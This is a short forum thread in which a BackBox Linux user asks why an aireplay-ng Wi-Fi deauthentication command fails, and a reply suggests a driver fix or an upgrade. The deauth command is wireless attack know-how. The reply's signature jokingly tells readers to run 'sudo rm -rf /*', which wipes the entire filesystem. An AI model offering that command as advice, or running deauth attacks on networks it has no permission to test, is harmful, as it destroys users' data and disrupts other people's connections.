Hi
I am using backbox 4.7 with live and persistence on a lenovo g580.
Whenever I issue command ""sudo aireplay-ng --deauth 100 -a xx:xx:xx:xx:xx:xx mon0""
I get the following error

Waiting for beacon frame (BSSID: D8:0F:99:49:B4:83) on channel -1
Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).

The aireplay-ng is working fine in kali 2.0 in another usb live and with persistence.

Any help would be appreciated.
TIA

Hi,

Check https://forum.backbox.org/software-support/backbox-4-5-broadcom-wireless-fix/

Anyway new BBox version is out with updated aircrack-ng version, you can try that too.

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*
